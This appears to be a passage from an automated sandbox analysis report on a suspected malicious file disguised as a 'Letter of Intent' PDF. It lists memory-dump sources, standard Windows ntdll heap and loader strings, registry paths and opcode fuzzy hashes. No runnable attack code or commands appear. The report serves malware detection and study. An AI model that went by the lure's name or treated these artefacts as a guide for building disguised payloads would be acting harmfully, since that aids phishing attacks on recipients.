                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 0-2586055223
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                      • API String ID: 0-336120773
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      • API String ID: 0-1168191160
                                                                                      Strings
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32F91728
                                                                                      • HEAP[%wZ]: , xrefs: 32F91712
                                                                                      • HEAP: , xrefs: 32F91596
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      Strings
                                                                                      • {, xrefs: 32FF3ABD
                                                                                      • 'LDR: %s(), invalid image format of MUI file , xrefs: 32FF3AB4
                                                                                      • LdrpLoadResourceFromAlternativeModule, xrefs: 32FF3AAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                                      • API String ID: 0-1697150599
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-1145731471
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                      • API String ID: 0-2391371766
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                                      • API String ID: 0-1146358195
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                      • API String ID: 0-318774311
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                      • API String ID: 0-3870751728
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                      • API String ID: 0-373624363
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %$&$@
                                                                                      • API String ID: 0-1537733988
                                                                                      • Opcode ID: 9c2f76ad9f296a7b43c7eb5469ddeb93eb322bc6bf6908f202448fd835999bd9
                                                                                      • Instruction ID: 0baaadc0b8445eeea1425d0182b764a7e068a75ef95b0454102a2d36a1d4cc93
                                                                                      • Opcode Fuzzy Hash: 9c2f76ad9f296a7b43c7eb5469ddeb93eb322bc6bf6908f202448fd835999bd9
                                                                                      • Instruction Fuzzy Hash: 0C71B0746083129FE304CF24C580A6BBBE9BF84758F108D5DE6E687290DB71D905CF92
                                                                                      Strings
                                                                                      • GlobalizationUserSettings, xrefs: 3306B834
                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3306B82A
                                                                                      • TargetNtPath, xrefs: 3306B82F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                      • API String ID: 0-505981995
                                                                                      • Opcode ID: db571936fc51eaa77fa0454d38cf8185b3beb4f4819f06c67ba49152ed4ec176
                                                                                      • Instruction ID: b95fd7706aed7dd935f78182c0d2876d1fe61af08abdf6d888bd30b4fe109e3c
                                                                                      • Opcode Fuzzy Hash: db571936fc51eaa77fa0454d38cf8185b3beb4f4819f06c67ba49152ed4ec176
                                                                                      • Instruction Fuzzy Hash: D8619FB2D41229ABDB21DF55DC88BDAB7F8EF04718F4105E9E508A7250CB749E84CFA0
                                                                                      Strings
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 32FEE6C6
                                                                                      • HEAP[%wZ]: , xrefs: 32FEE6A6
                                                                                      • HEAP: , xrefs: 32FEE6B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      • Opcode ID: 4d1e8086bde0805d12ce12cade2a10bf21d9a44468a666e3ac486558847c2394
                                                                                      • Instruction ID: 36744d66c994545e14426486cb5524c541e8fe5cc67edce5045a4ba983fb9e67
                                                                                      • Opcode Fuzzy Hash: 4d1e8086bde0805d12ce12cade2a10bf21d9a44468a666e3ac486558847c2394
                                                                                      • Instruction Fuzzy Hash: 2551F275600784EFE312CBA4D854F9AFBF8EF05358F1009A0EA81CB692DB74E900CB60
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 32FFA59A
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 32FFA589
                                                                                      • LdrpCompleteMapModule, xrefs: 32FFA590
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: 4c3b5054f3964416cbbca1e2174846c9e88d9333d31ee4b7c55b05b0e9ae03ea
                                                                                      • Instruction ID: 3146e6d052b3772568debd6ac12bc62e8a10b1a4f075dadae9da3a3b52a84217
                                                                                      • Opcode Fuzzy Hash: 4c3b5054f3964416cbbca1e2174846c9e88d9333d31ee4b7c55b05b0e9ae03ea
                                                                                      • Instruction Fuzzy Hash: 0D51F1B9700749ABEB11DB69C940B0B77E5AF40B58F180EA5EB529B7E1DB74E800CF40
                                                                                      Strings
                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3303DC32
                                                                                      • HEAP[%wZ]: , xrefs: 3303DC12
                                                                                      • HEAP: , xrefs: 3303DC1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                      • API String ID: 0-3815128232
                                                                                      • Opcode ID: d06e21ede377f807e6809866c87c70ff1d7c8f42dc8d7c88d82974996f6cdb3d
                                                                                      • Instruction ID: 1483ee45defa9bb71bf1e32a1c1634a6603f092428e6f1015c929ccf3031aefd
                                                                                      • Opcode Fuzzy Hash: d06e21ede377f807e6809866c87c70ff1d7c8f42dc8d7c88d82974996f6cdb3d
                                                                                      • Instruction Fuzzy Hash: 0E511179122350CAF360CE2AC840776B3E6EB473A4F444CCAE4E1CB681D676D847DB61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      • Opcode ID: d31a2155e0bd5ef829006f17b0d1f79bfc10d6076d736f51cdabed1945c731ab
                                                                                      • Instruction ID: 13b40be8ad109abd48e308e15fbc16dd1da9145686b9c7d195b98bd6946a339c
                                                                                      • Opcode Fuzzy Hash: d31a2155e0bd5ef829006f17b0d1f79bfc10d6076d736f51cdabed1945c731ab
                                                                                      • Instruction Fuzzy Hash: 884106BE3003908FEB16CF18C490769B7D09F41388F544DA9DB468B256DE74D885CF52
                                                                                      Strings
                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33001B39
                                                                                      • LdrpAllocateTls, xrefs: 33001B40
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 33001B4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-4274184382
                                                                                      • Opcode ID: f3b87f96a800b58a21fab390717bec232bcaea8185c60f93ecbf15a5952d82f1
                                                                                      • Instruction ID: 90415f080b9412655118bcfed497b67e394cc03337dc55960473acd5ebf5c1e4
                                                                                      • Opcode Fuzzy Hash: f3b87f96a800b58a21fab390717bec232bcaea8185c60f93ecbf15a5952d82f1
                                                                                      • Instruction Fuzzy Hash: 40417AB9A00619AFEB15DFA8C840AAEBBF6FF48704F104969E505B7210DB74A801CF90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-964947082
                                                                                      • Opcode ID: 12d068de6b3ba563dced0e336e48a0801dc378ee7d2376d3bc0399ec9020695f
                                                                                      • Instruction ID: a7508b1881a3463ab52ebb12733e0e5b96d597d0f63810b321eca75c17e53742
                                                                                      • Opcode Fuzzy Hash: 12d068de6b3ba563dced0e336e48a0801dc378ee7d2376d3bc0399ec9020695f
                                                                                      • Instruction Fuzzy Hash: A141FFB5A01349AFD701DFA4CA81F6A7BE8EB46344F0544FAEA51AF240CA30DA45CF50
                                                                                      Strings
                                                                                      • RtlCreateActivationContext, xrefs: 330029F9
                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 330029FE
                                                                                      • Actx , xrefs: 32FC33AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                      • API String ID: 0-859632880
                                                                                      • Opcode ID: b54c5728d8e83fa354cce8e2e4896aef6d22ad345f5088e80655b228dc75a243
                                                                                      • Instruction ID: e0f34b801e26e1985053db4ce14c755d5b61f00c987582030495507283ddd75b
                                                                                      • Opcode Fuzzy Hash: b54c5728d8e83fa354cce8e2e4896aef6d22ad345f5088e80655b228dc75a243
                                                                                      • Instruction Fuzzy Hash: 98311032600316DFEB16CF68D8D0F9A77A8EB447A4F5548A9EE04AF285CB74D845CB90
                                                                                      Strings
                                                                                      • @, xrefs: 3301B670
                                                                                      • GlobalFlag, xrefs: 3301B68F
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3301B632
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: 2145429eedebc0c71165419bf90865e7a3b3f990b2fb0fee0194906e0dceb893
                                                                                      • Instruction ID: 0d17f9b451a21060115c2fc24d56126a2ce3f2bc785967e9bffe9ce217a1da10
                                                                                      • Opcode Fuzzy Hash: 2145429eedebc0c71165419bf90865e7a3b3f990b2fb0fee0194906e0dceb893
                                                                                      • Instruction Fuzzy Hash: B1314CB5D00209AFDB00DFA4DC80BEEBBB8EF44744F5408A9E605E7250D7749E04CBA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                                      • API String ID: 0-1050206962
                                                                                      • Opcode ID: a8099a8c0090bf8a59cfb918a1d032d1b9f0f92033614cd52e4b6b22573aa1c0
                                                                                      • Instruction ID: 75469bab27bfa77710b55e59b4de3857d1c811172f7033f74f8ace83479ad29d
                                                                                      • Opcode Fuzzy Hash: a8099a8c0090bf8a59cfb918a1d032d1b9f0f92033614cd52e4b6b22573aa1c0
                                                                                      • Instruction Fuzzy Hash: 5B318D72D01219BFEB01EF94CC84EAEBBBDEB49764F4548A5EA00B7610D774DD048BA0
                                                                                      Strings
                                                                                      • LdrpInitializeTls, xrefs: 33001A47
                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 33001A40
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 33001A51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-931879808
                                                                                      • Opcode ID: 8a46e6bd9d52601a9f41a7526fbdff59ea93858aeb8984ab162e7bf0d96aa84a
                                                                                      • Instruction ID: f0d7b46b0a358acd7cd0e4b90142c2d43d53c568041abdb3bd56a115c395f677
                                                                                      • Opcode Fuzzy Hash: 8a46e6bd9d52601a9f41a7526fbdff59ea93858aeb8984ab162e7bf0d96aa84a
                                                                                      • Instruction Fuzzy Hash: 7F31E772A00312AFF714BB98C845F5B77F8AB44B54F0409A9EA00BB190DB70AD159F90
                                                                                      Strings
                                                                                      • @, xrefs: 32FD12A5
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 32FD127B
                                                                                      • BuildLabEx, xrefs: 32FD130F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                      • Instruction ID: 4f937d9f94d2d3813c767defaa78e541c1aa26cf22ba53e03a0f2461ae2d79ea
                                                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                      • Instruction Fuzzy Hash: A2318172A00619AFEB11AFA5CC40EDFBBBDEB84B50F044825EA14A7160DB70DA05CB90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
